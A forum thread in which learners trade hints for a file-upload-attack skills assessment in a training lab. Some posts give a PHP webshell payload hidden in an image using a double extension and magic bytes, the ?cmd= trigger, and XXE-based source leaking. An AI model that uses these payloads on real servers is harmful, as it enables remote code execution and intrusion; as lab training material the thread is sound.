File Upload Attacks - Skills Assessment

Thank you

@onthesauce is the best. Was able to solve it, but wasted the whole week without having ?cmd=<ls> at the end while checking the uploaded files, and thinking it was something else. So, for everyone who was able to upload files but does not see anything, that might be your last clue.

Hi everyone, how are you doing?

Happy new year!

I got the directory, I can see the file I uploaded. I can upload an SVG image, but I don't know how to continue from here. Any hint?

Thanks in advance!

Okay, after a couple of days of agony I did it. Whoever needs a hint, write me :slight_smile:

Thanks so much for this. This is so annoying from HTB. Why is there a submit AND an image upload button?!?! Confusing!


Hello, could I get your help please?

I don't know why my path to the uploaded file is not found, any ideas?
Today is 9th Feb 2023, so I tried 230209_, 230208_ and 230210_ but no results:


Haven't solved this yet, but I literally spent 30 minutes examining all the requests when I hit the blue button, trying to figure out what to do, before realizing the green arrow is a button and not an icon. Clicking the green button processes the image file. Going to go cry in a corner for wanting to ram my head against the wall, but I will get back to it now that I actually see how to get an image processed.


Having the exact same problem now. I tried appending combinations of the /var/www/html prefix but no luck. Did you figure it out?

No, unfortunately I didn't.

Since you already know the location where the file will be saved, upload a real image, intercept the POST request and send it to Repeater, add .phar.jpeg as the extension and, a couple of rows under "Content-Type", add "<?php system($_REQUEST['cmd']); ?>" into the code of the image!
Now from your browser [CTRL+U] view-source:http://68.183.47.54:31670/contact/user_feedback_submissions/230521_image.phar.jpeg?cmd=cd%20../../../../../;ls and you should see the flag. Doing so I avoided adding the magic bytes. Change ls to cat flagname.txt :wink:


So, I was able to find the upload directory as well as the whitelist/blacklist using xxe-base64-encode. However, when I try to upload a cmd webshell in Burp Repeater with filename being 230615_image.phar.jpeg, the Response is Only images are allowed. Any way to bypass this so I can read my flag in the page source code?

Finished - this assessment was a hard one.


I'm also having the same problem, I cannot even find the images I uploaded under the upload directory. I do GET requests for the files with renamed file versions and still get 404 error messages. What am I missing here? I appreciate any help.

I was able to do it today and get the flag. For some reason, when I was trying to access uploaded files yesterday, it wasn't working. I did the same steps today and I was able to access the uploaded files. I think there are bugs sometimes in these labs. This is too time-consuming.

Hi, could anyone please give me a hint on how to upload any file? I have been very stuck for a while now and nobody really seems to answer this question; at least it doesn't work for me.
Thanks!

Friends who are stuck, I have passed the test and I will give you some hints.

  1. Enum - What image types are available? (you can use it to read files)

  2. Pay attention to the size of the uploaded file date written (the output content of the date size is different)

  3. File extensions that support parsing (enumeration)

  4. MIME format, see: List of file signatures - Wikipedia for details

Think sequentially and you'll get the flag.

So I was redoing this Skills Assessment since it has been about 2 months and wanted to see if I could still figure it out. (I remember it being very difficult for me.) I was able to get the flag after some hints, but the thing I still can't figure out this time is how to find user_submissions_feedback. I have tried using the XXE example and changed the resource to the proper php file, but when I decode the base64, it just shows exactly everything that was requested. It's not showing the hidden directory or how to prepend the date to the file. Can someone help with this please?

You are on the right track!

Just recall that within the section of this module where they show you the trick, the lab is specifically expecting a .svg file... which is not the case for this skills assessment, as shown within the source code of the page: the file upload is expecting a .jpg, .jpeg, or .png file extension. That makes it the first problem (really a problem?) to solve.

The second problem is that you also need to provide a proper file content type to bypass the expected type of file which can be uploaded: an image file. Recall the content-type fuzzing part to find out what works...

Then, using the payload trick you thought of (XXE), you will be able to leak the proper .php source code file, which by the way shows all the filters to bypass and what happens to a file you upload on the server side: in other words, you know how to craft your webshell and where to "go" to trigger it.


Hi, can you help me?

this is ok:

but when I replace the content like this:
-----WebKitFormBoundaryAvVAv9WPj9RtZCe3
Content-Disposition: form-data; name="uploadFile"; filename="snails.phar.png"
Content-Type: image/png

‰PNG

<?php system($_REQUEST['cmd']); ?>

------WebKitFormBoundaryAvVAv9WPj9RtZCe3--
shows

Only images are allowed

I hope you can help me ,
thanks anyway, have a nice day